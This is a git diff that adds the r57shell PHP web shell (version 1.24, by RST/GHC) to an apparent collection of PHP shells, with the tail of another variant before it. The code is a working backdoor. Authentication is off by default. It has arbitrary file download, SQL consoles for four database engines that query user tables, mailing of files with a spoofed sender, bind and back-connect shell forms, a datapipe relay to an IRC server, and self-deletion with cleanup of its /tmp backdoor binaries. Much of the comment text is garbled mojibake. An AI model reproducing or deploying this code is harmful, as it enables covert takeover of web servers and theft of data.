sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> |ترجم إلى اللغة العربية بواسطة مستعمر version ".$version." ]---o</b></font></div></td></tr></table>".$f; +?> + diff --git a/php/PHPshell/r57shell127/r57shell127.jpg b/php/PHPshell/r57shell127/r57shell127.jpg new file mode 100644 index 0000000..8ba76d5 Binary files /dev/null and b/php/PHPshell/r57shell127/r57shell127.jpg differ diff --git a/php/PHPshell/r57shell127/r57shell127.php b/php/PHPshell/r57shell127/r57shell127.php new file mode 100644 index 0000000..2e685f7 --- /dev/null +++ b/php/PHPshell/r57shell127/r57shell127.php @@ -0,0 +1,2287 @@ +<?php +/******************************************************************************************************/ +/* +/* # # # # +/* # # # # +/* # # # # +/* # ## #### ## # +/* ## ## ###### ## ## +/* ## ## ###### ## ## +/* ## ## #### ## ## +/* ### ############ ### +/* ######################## +/* ############## +/* ######## ########## ####### +/* ### ## ########## ## ### +/* ### ## ########## ## ### +/* ### # ########## # ### +/* ### ## ######## ## ### +/* ## # ###### # ## +/* ## # #### # ## +/* ## ## +/* +/* +/* +/* r57shell.php - ٌêًèïٍ يà ïُï ïîçâîëے‏ùèé âàى âûïîëيےٍü ّهëë êîىàينû يà ٌهًâهًه ÷هًهç لًàَçهً +/* آû ىîوهٍه ٌêà÷àٍü يîâَ‏ âهًٌè‏ يà يàّهى ٌàéٍه: http://rst.void.ru +/* آهًٌèے: 1.24 (New Year Edition) +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* خٍنهëüيàے لëàمîنàًيîٌٍü çà ïîىîùü è èنهè: blf, virus, NorD è âٌهى ÷هًٍےى èç RST/GHC. +/******************************************************************************************************/ +/* ~~~ حàًٌٍîéêè | Options ~~~ */ + +// آûلîً ےçûêà | Language +// $language='ru' - ًٌٌَêèé (russian) +// $language='eng' - english (àيمëèéٌêèé) +$language='ru'; + +// ہٍَهيٍèôèêàِèے | Authentification +// $auth = 1; - ہٍَهيٍèôèêàِèے âêë‏÷هيà ( authentification = On ) +// $auth = 0; - ہٍَهيٍèôèêàِèے âûêë‏÷هيà ( authentification = Off ) +$auth = 0; + +// ثîمèي è ïàًîëü نëے نîٌٍَïà ê ٌêًèïٍَ (Login & Password for access) +// حإ اہءسؤـزإ رجإحبزـ دإذإؤ ذہاجإظإحبإج حہ رإذآإذإ!!! (CHANGE THIS!!!) +$name='r57'; // ëîمèي ïîëüçîâàٍهëے (user login) +$pass='r57'; // ïàًîëü ïîëüçîâàٍهëے (user password) +/******************************************************************************************************/ +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "1.24"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) + { + header('WWW-Authenticate: Basic realm="r57shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); + } +} +$head = '<!-- انًàâٌٍâَé آàٌے --> +<html> +<head> +<title>r57shell</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #eeeeee 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +if(isset($_GET['img'])&&!empty($_GET['img'])) + { + $images = array(); + $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; + $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; + @ob_clean(); + header("Content-type: image/gif"); + echo base64_decode($images[$_GET['img']]); + die(); + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mysql_query($query,$db); + $error = @mysql_error($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@mysql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mysql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); + if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} + else { + echo "<table width=100%><tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; } + echo "</tr>"; + while(ocifetch($stat)) + { + echo "<tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; } + echo "</tr>"; + } + echo "</table><br>"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "<form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'آûïîëيهييàے êîىàينà', +'ru_text2' =>'آûïîëيهيèه êîىàين يà ٌهًâهًه', +'ru_text3' =>'آûïîëيèٍü êîىàينَ', +'ru_text4' =>'ذàلî÷àے نèًهêٍîًèے', +'ru_text5' =>'اàمًَçêà ôàéëîâ يà ٌهًâهً', +'ru_text6' =>'ثîêàëüيûé ôàéë', +'ru_text7' =>'ہëèàٌû', +'ru_text8' =>'آûلهًèٍه àëèàٌ', +'ru_butt1' =>'آûïîëيèٍü', +'ru_butt2' 